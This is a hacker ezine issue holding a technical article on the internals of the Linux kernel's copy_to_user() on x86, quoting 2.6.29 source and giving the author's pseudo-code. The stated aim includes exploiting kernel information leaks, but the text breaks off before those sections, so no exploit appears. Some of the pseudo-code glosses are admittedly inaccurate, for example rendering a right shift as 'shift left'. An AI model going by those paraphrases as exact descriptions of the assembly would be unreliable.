[==============================================================================] [============================= .aware eZine Delta =============================] [==============================================================================] __ __ ___ __ __ __ __ _/ |_| |__ ____ __| _/|__| ____ |__|/ |______ | | \ __\ | \_/ __ \ / __ | | |/ ___\| \ __\__ \ | | | | | Y \ ___/ / /_/ | | / /_/ ) || | / __ \| |__ |__| |___| /\___ \ \____ | |__\___ /|__||__| (____ /____/ / | __ \/ \/_ \/ /_____/ \/ __ / | | \ ____ | | ____ ____ _____ __ __ _______/ |_ / \_/ \/ _ \| | / _ \_/ ___\\__ \ | | \/ ___/\ __\ \ = ( |_| ) |_( |_| ) \___ / __ \| | /\___ \ | | \__| | / \____/|____/\____/ \___ )____ /____//____ ) |__| \/ \/ \/ \/ [==============================================================================] mov al,13h ; .aware cr3w sets the correct video m0de - = === == ====] int 10h ; - = = = = === === == === == = = =========== =] ?010000+ #01011011100110010000# 10000001~ =11001101 101111 001000 0001# 10100 1011 1010 0001 O000 0001 1010 0101 ?110011 001000# 000D 110 100001100 001011100 100 110 010000100000 011101000110 100 ~001 10000101110100 00100000010010 010 ,01D 0000001101101011 1010101110011011 101 00D 001000000110101101 O10100101101100011 011 000 0100000011010010111$ 0100001000000110100 101 101 110001000000110100101 110100011100110010000 001 11 I0011011011000110010101 10010101110000001000000,11 000 010110111001100100001000 000111011101101001011101 000 11 O0100000100000011011010111 10010010000001100001011100 10 011 011010111001100100000011/ :100100110000101101001011 10O 011 01100101011001000010000 ~001110/ 10001101111001000000111 010 00~:1101000011001010010000 0011010000 11001010110000101110110Z01 10 01010110111001110011001 000000110100 10111010000100000011010 01 01 1100110010000001110111D 011010010111 :0100011010000010000001 11 01 000110100001 10 01 010010000001 11 00I 1101110100 011 100 100110 010 #10 11I 01 1+ ,1 +00 110 011101110100 011 01, 00000100000011 /01 111 0110011000100000 011 011 010110000101101110 011 110 I0100100000011101000 110 100 ~00110000101110100001O 000 000 ,1001001001000000110010+ 001 110 010011010010111011001100 101 001O 00000011101000110100001101 0010 =111 0011001000000110010001100001 011, 0011 101100111011001010111001000100 0000 1110, 10001101000011100100110111101110 =1010 11001 I110110100000100000011010Z 01011 ?10100I 0111001100100000, Z01100: :01001101/ $11101100, 1000111100100101110 .AWARE eZINE DELTA : WELCOME TO THE DIGITAL HOLOCAUST As you may know or not know, the eZine Delta never got released because only two articles were handed in. I decided to publish these two articles in this file, because why the hell not. rattle out. [==============================================================================] [--------------------[ copy_to_user and Information Leaks ]--------------------] [==============================================================================] _.d####b._ .############. .################. .##################.__ __ __ __ _ _ __ __ ##############/ _`|#\ V V // _` | '_/ -_) ##############\__,|# \_/\_/ \__,_|_| \___| ###########>"<###### *#########( )####* ##########>.<##### By: tping ################ *############* "T######T" ----------------------------------------------------- [Table of Contents] 1 Introduction 1.1 Intro to copy_to_user 1.2 Meeting access_ok macro 1.3 __copy_to_user Analysis and Exception Handling 1.4 __copy_to_user_ll Function 2 copt_to_user on non-WP processors 2.1 __copy_user Analysis 2.2 __copy_to_user_intel Analysis 3 copy_to_user Diagram 4 Kernel Information Leaks 4.1 Exploitation 4.2 CVE-2008-3792: SCTP-AUTH API 5 Fixing the bug 6 Conclusion 7 References ----------------------------------------------------- 1] Introduction This article was written to provide knowledge on a popular Linux kernel API's routine's internals after the suggestion of dexter (thanks man) for doing so about two years ago. Throughout this document various code snippets are being presented and analysed, all of them can be found in Linux kernel 2.6.29 release (the latest by the time of this writing). The main aim of this work is to provide an extensive review of the copy_to_user()'s internals. Hopefully, in such depth that no previous knowledge of kernel programming for the Linux kernel will be required by the reader. The only requirements for getting something out of this work is knowledge of C programming, a little bit of IA-32 assembly since this article focuses specifically on x86 architecture and of course, spare time. At the end there will be a section dedicated to public vulnerabilities found in kernel code that uses this routine and how those can be abused. So, lay back, relax... and enjoy the journey. 1.1] Intro to copy_to_user copy_to_user (as it is implied by its name) is a kernel API function for copying data from kernel memory into user space memory. Its prototype is this: ------------------------------------------------------------------[snip]-------- unsigned long copy_to_user(void __user * to, const void * from, unsigned long n); ------------------------------------------------------------------[snip]-------- Where these arguments represent the following elements: - to Pointer to the destination in user space. - from Pointer to the source address in kernel space. - n Number of bytes to copy. Qualifier __user which is being used at the user space pointer, is a C macro located at include/linux/compiler.h which looks like this: ------------------------------------------------------------------[snip]-------- #ifdef __CHECKER__ # define __user __attribute__((noderef, address_space(1))) ... #else # define __user ------------------------------------------------------------------[snip]-------- This ensures that user space pointer has an address that belongs to the user space range. However, this is applied only when this code is compiled with __CHECKER__ directive set. This happens only when sparse (Semantic C Parser) is being used. Back to our function, the value returned is zero on success or the number of bytes that could not be copied in any other case. Since this article's focus is on x86 architecture, the function analysed here can be found at arch/x86/usercopy_32.c file. ------------------------------------------------------------------[snip]-------- unsigned long 852 copy_to_user(void __user *to, const void *from, unsigned long n) 853 { 854 if (access_ok(VERIFY_WRITE, to, n)) 855 n = __copy_to_user(to, from, n); 856 return n; 857 } 858 EXPORT_SYMBOL(copy_to_user); ------------------------------------------------------------------[snip]-------- Obviously, this is a wrapper around __copy_to_user() function which is discussed in depth in section "__copy_to_user Analysis" later in this document. The above code performs a check using access_ok() macro at line 854 passing the destination pointer and the requested bytes as arguments to access_ok before invoking the actual routine. Finally, it exports copy_to_user symbol in order to be accessible to the rest of the kernel routines. 1.2] Meeting access_ok macro This is a commonly used C macro in Linux kernel code. In almost any read or write operation from or to user space this macro is employed to check the validity of the given pointer. This macro is defined at the arch/x86/include/asm/uaccess.h header file like this: ------------------------------------------------------------------[snip]-------- #define access_ok(type, addr, size) (likely(__range_not_ok(addr, size) == 0)) ------------------------------------------------------------------[snip]-------- It takes three arguments which represent: - type The type of access which can be either VERIFY_READ or VERIFY_WRITE. - addr Pointer to user space which indicates the start of the block to check. - size The size of block to check. The two availabe types are also defined in the same header file. ------------------------------------------------------------------[snip]-------- #define VERIFY_READ 0 #define VERIFY_WRITE 1 ------------------------------------------------------------------[snip]-------- The body of access_ok uses another macro, likely() which can be seen at include/linux/compiler.h. This performs branch prediction for efficiency purposes. The proceeding call to __range_not_ok() reveals that the type parameter is completely ignored (at least on x86 processors) which makes it one less thing to worry about. The code of the latter macro is this: ------------------------------------------------------------------[snip]-------- 50 #define __range_not_ok(addr, size) \ 51 ({ \ 52 unsigned long flag, roksum; \ 53 __chk_user_ptr(addr); \ 54 asm("add %3,%1 ; sbb %0,%0 ; cmp %1,%4 ; sbb $0,%0" \ 55 : "=&r" (flag), "=r" (roksum) \ 56 : "1" (addr), "g" ((long)(size)), \ 57 "rm" (current_thread_info()->addr_limit.seg)); \ 58 flag; \ 59 }) ------------------------------------------------------------------[snip]-------- It is a straightforward inline assembly operation which can be splited up to the following pseudo-code provided by the Linux kernel developers: (u33)addr + (u33)size >= (u33)current_thread_info()->addr_limit.seg Macro invoked at line 53 is also used by sparse (Semantic PARSEr for C), it only affects this parsing process in checking the arguments' data types Specifically, this macro of include/linux/compiler.h does the following. ------------------------------------------------------------------[snip]-------- 6 #ifdef __CHECKER__ ... 18 extern void __chk_user_ptr(const volatile void __user *); ... 20 #else ... 27 # define __chk_user_ptr(x) (void)0 ------------------------------------------------------------------[snip]-------- Meaning that if __CHECKER__ is enabled, it will check the argument type to be that of the one defined at line 18, else it will just do nothing. To conclude, access_ok on x86 checks only that the given pointer is in the boundaries of the calling thread's segment limit. Also, it returns a non zero value (true) if pointer+size is valid, otherwise it returns a zero value (false). 1.3] __copy_to_user Analysis and Exception Handling This is the function being internally invoked when copy_to_user() calls are made. It is important to note that this function may sleep, meaning that it could sleep (aka wait) until its lock(s) is/are available to it. The code of this static function is at arch/x86/include/asm/uaccess_32.h header file. ------------------------------------------------------------------[snip]-------- 82 static __always_inline unsigned long __must_check 83 __copy_to_user(void __user *to, const void *from, unsigned long n) 84 { 85 might_fault(); 86 return __copy_to_user_inatomic(to, from, n); 87 } ------------------------------------------------------------------[snip]-------- Where the two qualifiers in the function's scope are: - __always_inline A GCC's attribute for enforcing the machine code of this function being used wherever it is being invoked instead of calling it using common function calling conventions. - __must_check Another GCC's attribute that generates a warning if the return value of the function is not being used. Because of the nature of this routine, might_fault() is invoked at line 85 to handle any waiting for locks scenarions. Next, at line 86 a call to __copy_to_user_inatomic() is being made. This function can be found at arch/x86/include/asm/uaccess_32.h for x86 architecture. ------------------------------------------------------------------[snip]-------- 44 static __always_inline unsigned long __must_check 45 __copy_to_user_inatomic(void __user *to, const void *from, unsigned long n) 46 { 47 if (__builtin_constant_p(n)) { 48 unsigned long ret; 49 50 switch (n) { 51 case 1: 52 __put_user_size(*(u8 *)from, (u8 __user *)to, 53 1, ret, 1); 54 return ret; 55 case 2: 56 __put_user_size(*(u16 *)from, (u16 __user *)to, 57 2, ret, 2); 58 return ret; 59 case 4: 60 __put_user_size(*(u32 *)from, (u32 __user *)to, 61 4, ret, 4); 62 return ret; 63 } 64 } 65 return __copy_to_user_ll(to, from, n); 66 } ------------------------------------------------------------------[snip]-------- The above code might enter the if statement at line 47 if the GCC's built-in function __builtin_constant_p() returns a non-zero value. This can happen if 'n' has constant value and this will allow GCC perform constant-folding on expressions. This however, will affect only 1, 2 and 4 bytes requests. If this is the case, then __put_user_size() macro will be invoked. Its code is part of arch/x86/include/asm/uaccess.h. ------------------------------------------------------------------[snip]-------- 267 #define __put_user_size(x, ptr, size, retval, errret) \ 268 do { \ 269 retval = 0; \ 270 __chk_user_ptr(ptr); \ 271 switch (size) { \ 272 case 1: \ 273 __put_user_asm(x, ptr, retval, "b", "b", "iq", errret); \ 274 break; \ 275 case 2: \ 276 __put_user_asm(x, ptr, retval, "w", "w", "ir", errret); \ 277 break; \ 278 case 4: \ 279 __put_user_asm(x, ptr, retval, "l", "k", "ir", errret);\ 280 break; \ 281 case 8: \ 282 __put_user_u64((__typeof__(*ptr))(x), ptr, retval); \ 283 break; \ 284 default: \ 285 __put_user_bad(); \ 286 } \ 287 } while (0) ------------------------------------------------------------------[snip]-------- The user pointer (ptr) is passed into __chk_user_ptr() which was discussed earlier in this document, and a switch statement for size of 1, 2, 4, and 8 follows up. Macro __put_user_asm() which belongs to the same header file is this: ------------------------------------------------------------------[snip]-------- 378 #define __put_user_asm(x, addr, err, itype, rtype, ltype, errret) \ 379 asm volatile("1: mov"itype" %"rtype"1,%2\n" \ 380 "2:\n" \ 381 ".section .fixup,\"ax\"\n" \ 382 "3: mov %3,%0\n" \ 383 " jmp 2b\n" \ 384 ".previous\n" \ 385 _ASM_EXTABLE(1b, 3b) \ 386 : "=r"(err) \ 387 : ltype(x), "m" (__m(addr)), "i" (errret), "0" (err)) ------------------------------------------------------------------[snip]-------- Damn you GCC! This is one of the most ugly codes I've ever seen. Anyway, considering the case of a single byte call to copy_to_user() the above macro would generate assembly code similar to this pseudo-code: 1: movb *(struct __large_struct __user *)user_ptr, errret 2: .section .fixup, "ax" 3: mov errret, kernel_ptr jmp 2b .previous .section __ex_table,"a" .align 4 .long 1b, 3b .previous Before explaining what this does, here is why it is translated like this. ------------------------------------------------------------------[snip]-------- 369 /* FIXME: this hack is definitely wrong -AK */ 370 struct __large_struct { unsigned long buf[100]; }; 371 #define __m(x) (*(struct __large_struct __user *)(x)) ------------------------------------------------------------------[snip]-------- And _ASM_EXTABLE() is located at arch/x86/include/asm/asm.h and is quite straightforward in comparison to macros like the previously discussed one. ------------------------------------------------------------------[snip]-------- 40 /* Exception table entry */ 41 # define _ASM_EXTABLE(from,to) \ 42 __ASM_EX_SEC \ 43 _ASM_ALIGN "\n" \ 44 _ASM_PTR #from "," #to "\n" \ 45 " .previous\n" ------------------------------------------------------------------[snip]-------- The macros used internally in _ASM_EXTABLE() are the following. ------------------------------------------------------------------[snip]-------- 8 # define __ASM_FORM(x) " " #x " " 9 # define __ASM_EX_SEC " .section __ex_table,\"a\"\n" ... 13 # define __ASM_SEL(a,b) __ASM_FORM(a) ... 21 #define _ASM_PTR __ASM_SEL(.long, .quad) 22 #define _ASM_ALIGN __ASM_SEL(.balign 4, .balign 8) ------------------------------------------------------------------[snip]-------- The pseudo-code demonstrated earlier copies one single byte and then a "new" ELF section named .fixup rises up. Now, this section contains this code from the above example: mov errret, kernel_ptr jmp 2b And the other new section, __ex_table has this code: .long 1b, 3b Those represent the local (backward) labels. Label 1 has the critical code that could easily fail. It's the actual copy operation and label 3 is the exception handling code. This means that the exception handling goes like this in an erroneous situation. Access to invalid address: 1) MMU generates exception 2) CPU calls do_page_fault 3) do_page_fault calls search_exception_table 4) search_exception_table looks up the address in the exception table (i.e. the contents of the ELF section __ex_table and returns the address of the associated fault handle code). 5) do_page_fault modifies its own return address to point to the fault handle code and returns. 6) execution continues in the fault handling code. This is almost exactly the same as on [1]. Although, if __copy_to_user_inatomic() does not fall into one of those four cases (copy of 1, 2, 4 or 8 bytes) it will immediately invoke __copy_to_user_ll(). Because of its complexity this will be discussed seperately in the next section. 1.4] __copy_to_user_ll Function This function will be discussed in segments. The first condition being checked is the following. ------------------------------------------------------------------[snip]-------- 717 unsigned long __copy_to_user_ll(void __user *to, const void *from, 718 unsigned long n) 719 { 720 #ifndef CONFIG_X86_WP_WORKS_OK 721 if (unlikely(boot_cpu_data.wp_works_ok == 0) && 722 ((unsigned long)to) < TASK_SIZE) { ------------------------------------------------------------------[snip]-------- This option is enabled in the default kernel and by doing so, the kernel will assume that processor can successfully write to pages while in supervisor mode. The if clause at line 721 uses a CPU capability declared in arch/x86/include/asm/processor.h header file like this: extern struct cpuinfo_x86 boot_cpu_data; This structure is part of the same header file and includes CPU specific type and hardware flags. Those are referenced directly in head.S. The member used at line 721 is this: ------------------------------------------------------------------[snip]-------- 58 struct cpuinfo_x86 { 59 __u8 x86; /* CPU family */ ... 63 #ifdef CONFIG_X86_32 64 char wp_works_ok; /* It doesn't on 386's */ ... 114 } __attribute__((__aligned__(SMP_CACHE_BYTES))); ------------------------------------------------------------------[snip]-------- Using this member, __copy_to_user_ll() checks that the writing to pages (wp) capability works and the destination pointer (to) isn't greater than TASK_SIZE which is also part of arch/x86/include/asm/processor.h. ------------------------------------------------------------------[snip]-------- 837 #ifdef CONFIG_X86_32 838 /* 839 * User space process size: 3GB (default). 840 */ 841 #define TASK_SIZE PAGE_OFFSET ------------------------------------------------------------------[snip]-------- Even though it's explicity stated in the comment. The reason that TASK_SIZE is 3GB is that PAGE_OFFSET from arch/x86/include/asm/page.h is: #define PAGE_OFFSET ((unsigned long)__PAGE_OFFSET) Which can be found at arch/x86/include/asm/page_32.h like this: #define __PAGE_OFFSET _AC(CONFIG_PAGE_OFFSET, UL) Where _AC() from include/linux/const.h is simply: #define _AC(X,Y) X And at last, CONFIG_PAGE_OFFSET is defined at the kernel's configuration file and by default on 32-bit x86 processors is 0xc0000000. This value in decimal is 3221225472. This is why it is 3GB. Assuming that the processor doesn't have writing capability to pages on supervisor mode (WP=0) support and destination buffer is no more than 3GB long, this is what will follow up. ------------------------------------------------------------------[snip]-------- 723 /* 724 * When we are in an atomic section (see 725 * mm/filemap.c:file_read_actor), return the full 726 * length to take the slow path. 727 */ 728 if (in_atomic()) 729 return n; ------------------------------------------------------------------[snip]-------- This is a macro from include/linux/hardirq.h that detects if the caller runs in an atomic context. However, this macro cannot always detect locks and in particular, spin-locks in non-preemptible kernels [3]. This is how it is defined. #define in_atomic() ((preempt_count() & ~PREEMPT_ACTIVE) != PREEMPT_INATOMIC_BASE) Where preemt_count() is macro at include/linux/preempt.h that retrieves the preemt_count member of the calling thread from the cache as you can see here. #define preempt_count() (current_thread_info()->preempt_count) This is part of the low level structure thread_info, located at arch/x86/include/asm/thread_info.h and used by entry.S for immediate access. The important for the above call member is shown here. ------------------------------------------------------------------[snip]-------- 26 struct thread_info { 27 struct task_struct *task; /* main task structure */ ... 32 int preempt_count; /* 0 => preemptable, 33 <0 => BUG */ ... 43 }; ------------------------------------------------------------------[snip]-------- And the other two constant values in in_atomic() macro are #define PREEMPT_ACTIVE 0x10000000 And ------------------------------------------------------------------[snip]-------- #if defined(CONFIG_PREEMPT) # define PREEMPT_INATOMIC_BASE kernel_locked() ... #else # define PREEMPT_INATOMIC_BASE 0 ------------------------------------------------------------------[snip]-------- kernel_locked() is a dummy check of the locks' counter located at include/ linux/smp_lock.h. #define kernel_locked() (current->lock_depth >= 0) After passing this locks' check __copy_to_user_ll() enters a loop which does manually the copy operation. It keeps iterating as long as number of bytes 'n' has not reached zero. ------------------------------------------------------------------[snip]-------- 731 /* 732 * CPU does not honor the WP bit when writing 733 * from supervisory mode, and due to preemption or SMP, 734 * the page tables can change at any time. 735 * Do it manually. Manfred 736 */ 737 while (n) { 738 unsigned long offset = ((unsigned long)to)%PAGE_SIZE; 739 unsigned long len = PAGE_SIZE - offset; 740 int retval; 741 struct page *pg; 742 void *maddr; 743 744 if (len > n) 745 len = n; ------------------------------------------------------------------[snip]-------- Variables offset and len are initialized to store the offset to the user space destination pointer and its size. A pointer to a page structure at line 741 follows. This structure is defined at include/linux/mm_types.h and used to keep track of each physical page of the system. Next, if the calculated length is greater than the requested number of bytes 'n', it updates 'len' to be equal to this value. The function continues like this ------------------------------------------------------------------[snip]-------- 746 747 survive: 748 down_read(¤t->mm->mmap_sem); 749 retval = get_user_pages(current, current->mm, 750 (unsigned long)to, 1, 1, 0, &pg, NULL); ------------------------------------------------------------------[snip]-------- The call to down_read() of kernel/rwsem.c simply locks this memory with a semaphore. The subsequent call to get_user_pages() retrives the page(s) of the 'current' process and stores it into 'pg' page. Since this is a memory management routine that requires an article by itself, it won't be discussed any further. Nevertheless, you can find it at at mm/memory.c and start studying it from there. The next code in __copy_to_user_ll() is this. ------------------------------------------------------------------[snip]-------- 751 752 if (retval == -ENOMEM && is_global_init(current)) { 753 up_read(¤t->mm->mmap_sem); 754 congestion_wait(WRITE, HZ/50); 755 goto survive; 756 } 757 ------------------------------------------------------------------[snip]-------- If the previous call to get_user_pages() returned that there is no memory (-ENOMEM) and if the current process is the INIT process which is checked using the include/linux/sched.h's function is_global_init. ------------------------------------------------------------------[snip]-------- 1573 static inline int is_global_init(struct task_struct *tsk) 1574 { 1575 return tsk->pid == 1; 1576 } ------------------------------------------------------------------[snip]-------- Then, unlock the semaphore (line 753) and wait for up to 50 seconds to become uncongested using congestion_wait() function from mm/backing-dev.c At last, go back to the 'survive' label and continue the execution. This is done in order to retry reading the page(s) required for the copying process to proceed. The following check is this: ------------------------------------------------------------------[snip]-------- 758 if (retval != 1) { 759 up_read(¤t->mm->mmap_sem); 760 break; 761 } 762 ------------------------------------------------------------------[snip]-------- It checks whether get_user_pages() returned a value not equal to one which could happen in numerous situations, including a requested length having a negative value. If this evaluates to true, it will release the semaphore and immediately break. If this isn't the case, this is what follows up. ------------------------------------------------------------------[snip]-------- 763 maddr = kmap_atomic(pg, KM_USER0); 764 memcpy(maddr + offset, from, len); 765 kunmap_atomic(maddr, KM_USER0); ------------------------------------------------------------------[snip]-------- This is a simple sequence of map, copy and unmap operation. Function at line 763 is just a wrapper around kmap_atomic_prot() which is located at the arch/x86/mm/highmem_32.c memory management source code file: ------------------------------------------------------------------[snip]-------- 94 void *kmap_atomic(struct page *page, enum km_type type) 95 { 96 return kmap_atomic_prot(page, type, kmap_prot); 97 } ------------------------------------------------------------------[snip]-------- This atomic kmap function is faster than kmap() because it doesn't make use of a global lock. After getting the requested mapping, a call to memcpy() is made to copy the kernel data from 'from' pointer to the page at the offset calculated previously at line 738. Finally ,the while loop does this: ------------------------------------------------------------------[snip]-------- 766 set_page_dirty_lock(pg); 767 put_page(pg); 768 up_read(¤t->mm->mmap_sem); 769 770 from += len; 771 to += len; 772 n -= len; 773 } 774 return n; 775 } 776 #endif ------------------------------------------------------------------[snip]-------- The call at line 767 is from a function found at mm/page-writeback.c and used to mark this page as dirty. Then the page is being put in the cache using put_page() from mm/swap.c and finally, up_read() is used to release the semaphore from the thread. Source and destination pointers are updated to point after the bytes being copied and 'n' is decremented by the number of copied bytes. If this was a successful copy, then probably 'n' would be zero and this while loop will terminate. However, if the processor does have enabled the CONFIG_X86_WP_WORKS_OK option, it will fall into the following part of __copy_to_user_ll(): ------------------------------------------------------------------[snip]-------- 777 if (movsl_is_ok(to, from, n)) 778 __copy_user(to, from, n); 779 else 780 n = __copy_user_intel(to, from, n); 781 return n; 782 } 783 EXPORT_SYMBOL(__copy_to_user_ll); ------------------------------------------------------------------[snip]-------- The arguments are passed through a macro of arch/x86/lib/usercopy_32.c. This is used as an alternative copy when WP is supported by the processor. ------------------------------------------------------------------[snip]-------- 24 static inline int __movsl_is_ok(unsigned long a1, unsigned long a2, unsigned long n) 25 { 26 #ifdef CONFIG_X86_INTEL_USERCOPY 27 if (n >= 64 && ((a1 ^ a2) & movsl_mask.mask)) 28 return 0; 29 #endif 30 return 1; 31 } 32 #define movsl_is_ok(a1, a2, n) \ 33 __movsl_is_ok((unsigned long)(a1), (unsigned long)(a2), (n)) ------------------------------------------------------------------[snip]-------- If CONFIG_X86_INTEL_USERCOPY is disabled it will always return 1 but in any other case, it will check whether the number of bytes to be copied is greater than, or equal to 64 and user space and kernel space pointers should contain movsl_mask.mask flag. This movls_mask structure is defined at arch/x86/include/asm/uaccess.h like that. ------------------------------------------------------------------[snip]-------- 437 /* 438 * movsl can be slow when source and dest are not both 8-byte aligned 439 */ 440 #ifdef CONFIG_X86_INTEL_USERCOPY 441 extern struct movsl_mask { 442 int mask; 443 } ____cacheline_aligned_in_smp movsl_mask; 444 #endif ------------------------------------------------------------------[snip]-------- If this expression returns a non-zero value, then movsl_is_ok() will return zero and it will execute the function at line 780 on its else clause. Otherwise, it will invoke __copy_user(). Both of these functions are described in detail next in separate sections. 2.1] __copy_user Analysis This is another C macro found at arch/x86/lib/usercopy_32.c. It is written entirely in assembler as a generic copy routine. ------------------------------------------------------------------[snip]-------- 639#define __copy_user(to, from, size) \ 640do { \ 641 int __d0, __d1, __d2; \ 642 __asm__ __volatile__( \ 643 " cmp $7,%0\n" \ 644 " jbe 1f\n" \ 645 " movl %1,%0\n" \ 646 " negl %0\n" \ 647 " andl $7,%0\n" \ 648 " subl %0,%3\n" \ 649 "4: rep; movsb\n" \ 650 " movl %3,%0\n" \ 651 " shrl $2,%0\n" \ 652 " andl $3,%3\n" \ 653 " .align 2,0x90\n" \ 654 "0: rep; movsl\n" \ 655 " movl %3,%0\n" \ 656 "1: rep; movsb\n" \ 657 "2:\n" \ 658 ".section .fixup,\"ax\"\n" \ 659 "5: addl %3,%0\n" \ 660 " jmp 2b\n" \ 661 "3: lea 0(%3,%0,4),%0\n" \ 662 " jmp 2b\n" \ 663 ".previous\n" \ 664 ".section __ex_table,\"a\"\n" \ 665 " .align 4\n" \ 666 " .long 4b,5b\n" \ 667 " .long 0b,3b\n" \ 668 " .long 1b,2b\n" \ 669 ".previous" \ 670 : "=&c"(size), "=&D" (__d0), "=&S" (__d1), "=r"(__d2) \ 671 : "3"(size), "0"(size), "1"(to), "2"(from) \ 672 : "memory"); \ 673} while (0) ------------------------------------------------------------------[snip]-------- Again, it is the same concept. Exception handler associates the critical instructions with the appropriate code like this: Code Label Exception Label -------------------------------------- 4 5 0 3 1 2 The rest of the code is a common copy routine written in assembler. Here is an overview of the code. compare from with size jbe 1f move __d0, size neg size from & size size - __d2 4: repeat move byte string move __d2 to size shift __d1 left by size __d2 & __d2 .align 2, 0x90 0: repeat move long string move __d2 to size 1: repeat move byte string 2: .section .fixup, "ax" 5: __d2 & size jump 2b 3: load 0(__d2, size, 4) into size jump 2b .previous .section __ex_table, "a" .align 4 .long 4b, 5b .long 0b, 3b .long 1b, 2b .previous Which represents a common copy routine written in assembly. The above pseudo-code is not 100% accurate but it is an abstract representation of the original inline assembly code. 2.2] __copy_user_intel() Analysis This routine is invoked by __copy_to_user_ll() function at line 780 at the else clause. This is also written at pure assembly and can be found at arch/x86/lib/usercopy_32.c like this: ------------------------------------------------------------------[snip]-------- 228#ifdef CONFIG_X86_INTEL_USERCOPY 229static unsigned long 230__copy_user_intel(void __user *to, const void *from, unsigned long size) 231{ 232 int d0, d1; 233 __asm__ __volatile__( 234 " .align 2,0x90\n" 235 "1: movl 32(%4), %%eax\n" 236 " cmpl $67, %0\n" 237 " jbe 3f\n" 238 "2: movl 64(%4), %%eax\n" 239 " .align 2,0x90\n" 240 "3: movl 0(%4), %%eax\n" 241 "4: movl 4(%4), %%edx\n" 242 "5: movl %%eax, 0(%3)\n" 243 "6: movl %%edx, 4(%3)\n" 244 "7: movl 8(%4), %%eax\n" 245 "8: movl 12(%4),%%edx\n" 246 "9: movl %%eax, 8(%3)\n" 247 "10: movl %%edx, 12(%3)\n" 248 "11: movl 16(%4), %%eax\n" 249 "12: movl 20(%4), %%edx\n" 250 "13: movl %%eax, 16(%3)\n" 251 "14: movl %%edx, 20(%3)\n" 252 "15: movl 24(%4), %%eax\n" 253 "16: movl 28(%4), %%edx\n" 254 "17: movl %%eax, 24(%3)\n" 255 "18: movl %%edx, 28(%3)\n" 256 "19: movl 32(%4), %%eax\n" 257 "20: movl 36(%4), %%edx\n" 258 "21: movl %%eax, 32(%3)\n" 259 "22: movl %%edx, 36(%3)\n" 260 "23: movl 40(%4), %%eax\n" 261 "24: movl 44(%4), %%edx\n" 262 "25: movl %%eax, 40(%3)\n" 263 "26: movl %%edx, 44(%3)\n" 264 "27: movl 48(%4), %%eax\n" 265 "28: movl 52(%4), %%edx\n" 266 "29: movl %%eax, 48(%3)\n" 267 "30: movl %%edx, 52(%3)\n" 268 "31: movl 56(%4), %%eax\n" 269 "32: movl 60(%4), %%edx\n" 270 "33: movl %%eax, 56(%3)\n" 271 "34: movl %%edx, 60(%3)\n" 272 " addl $-64, %0\n" 273 " addl $64, %4\n" 274 " addl $64, %3\n" 275 " cmpl $63, %0\n" 276 " ja 1b\n" 277 "35: movl %0, %%eax\n" 278 " shrl $2, %0\n" 279 " andl $3, %%eax\n" 280 " cld\n" 281 "99: rep; movsl\n" 282 "36: movl %%eax, %0\n" 283 "37: rep; movsb\n" 284 "100:\n" 285 ".section .fixup,\"ax\"\n" 286 "101: lea 0(%%eax,%0,4),%0\n" 287 " jmp 100b\n" 288 ".previous\n" 289 ".section __ex_table,\"a\"\n" 290 " .align 4\n" 291 " .long 1b,100b\n" 292 " .long 2b,100b\n" 293 " .long 3b,100b\n" 294 " .long 4b,100b\n" 295 " .long 5b,100b\n" 296 " .long 6b,100b\n" 297 " .long 7b,100b\n" 298 " .long 8b,100b\n" 299 " .long 9b,100b\n" 300 " .long 10b,100b\n" 301 " .long 11b,100b\n" 302 " .long 12b,100b\n" 303 " .long 13b,100b\n" 304 " .long 14b,100b\n" 305 " .long 15b,100b\n" 306 " .long 16b,100b\n" 307 " .long 17b,100b\n" 308 " .long 18b,100b\n" 309 " .long 19b,100b\n" 310 " .long 20b,100b\n" 311 " .long 21b,100b\n" 312 " .long 22b,100b\n" 313 " .long 23b,100b\n" 314 " .long 24b,100b\n" 315 " .long 25b,100b\n" 316 " .long 26b,100b\n" 317 " .long 27b,100b\n" 318 " .long 28b,100b\n" 319 " .long 29b,100b\n" 320 " .long 30b,100b\n" 321 " .long 31b,100b\n" 322 " .long 32b,100b\n" 323 " .long 33b,100b\n" 324 " .long 34b,100b\n" 325 " .long 35b,100b\n" 326 " .long 36b,100b\n" 327 " .long 37b,100b\n" 328 " .long 99b,101b\n" 329 ".previous" 330 : "=&c"(size), "=&D" (d0), "=&S" (d1) 331 : "1"(to), "2"(from), "0"(size) 332 : "eax", "edx", "memory"); 333 return size; 334} 335 ------------------------------------------------------------------[snip]-------- Here is an equivalent pseudo-code for the above assembly routine: .align 2, 0x90 1: move 32(from) to %eax compare 67 with size jbe 3f 2: move 64(from) to %eax .align 2, 0x90 3: move 0(from) to %eax 4: move 4(from) to %edx 5: move %eax to 0(to) 6: move %edx to 4(to) 7: move 8(from) to %eax 8: move 12(from) to %edx 9: move %eax to 8(to) 10: move %edx to 12(to) 11: move 16(from) to %eax 12: move 20(from) to %edx 13: move %eax to 16(to) 14: move %edx to 20(to) 15: move 24(from) to %eax 16: move 28(from) to %edx 17: move %eax to 24(to) 18: move %edx to 28(to) 19: move 32(from) to %eax 20: move 36(from) to %edx 21: move %eax to 32(to) 22: move %edx to 36(to) 23: move 40(from) to %eax 24: move 44(from) to %edx 25: move %eax to 40(to) 26: move %edx to 44(to) 27: move 48(from) to %eax 28: move 52(from) to %edx 29: move %eax to 48(to) 30: move %edx to 52(to) 31: move 56(from) to %eax 32: move 60(from) to %edx 33: move %eax to 56(to) 34: move %edx to 60(to) size & -64 from & 64 to & 64 compare 63 with size ja 1b 35: move size to %eax shift size left by 2 %eax & 3 cld repeat 99: move long string 36: move %eax to size 37: repeat move byte string 100: .section .fixup "ax" 101: load 0(%eax, size, 4) into size jump 100b .previous .section __ex_table, "a" .align 4 .long 1b, 100b .long 2b, 100b .long 3b, 100b .long 4b, 100b .long 6b, 100b .long 7b, 100b .long 8b, 100b .long 9b, 100b .long 10b, 100b .long 11b, 100b .long 12b, 100b .long 13b, 100b .long 14b, 100b .long 15b, 100b .long 16b, 100b .long 17b, 100b .long 18b, 100b .long 19b, 100b .long 20b, 100b .long 21b, 100b .long 22b, 100b .long 23b, 100b .long 24b, 100b .long 25b, 100b .long 26b, 100b .long 27b, 100b .long 28b, 100b .long 29b, 100b .long 30b, 100b .long 31b, 100b .long 32b, 100b .long 33b, 100b .long 34b, 100b .long 35b, 100b .long 36b, 100b .long 37b, 100b .long 99b, 101b .previous 3] copy_to_user Diagram I found it quite useful to have a diagram of the functions being invoked for future reference and for this reason I decided to included in this article. So, here is an abstract representation of the copy_to_user routine. copy_to_user | +--> access_ok | +--> __copy_to_user | +--> might_fault | +--> __copy_to_user_inatomic | +--> __put_user_size | +--> __copy_to_user_ll | +--> in_atomic | +--> down_read <-------------+ | | +--> get_user_pages | | | +--> 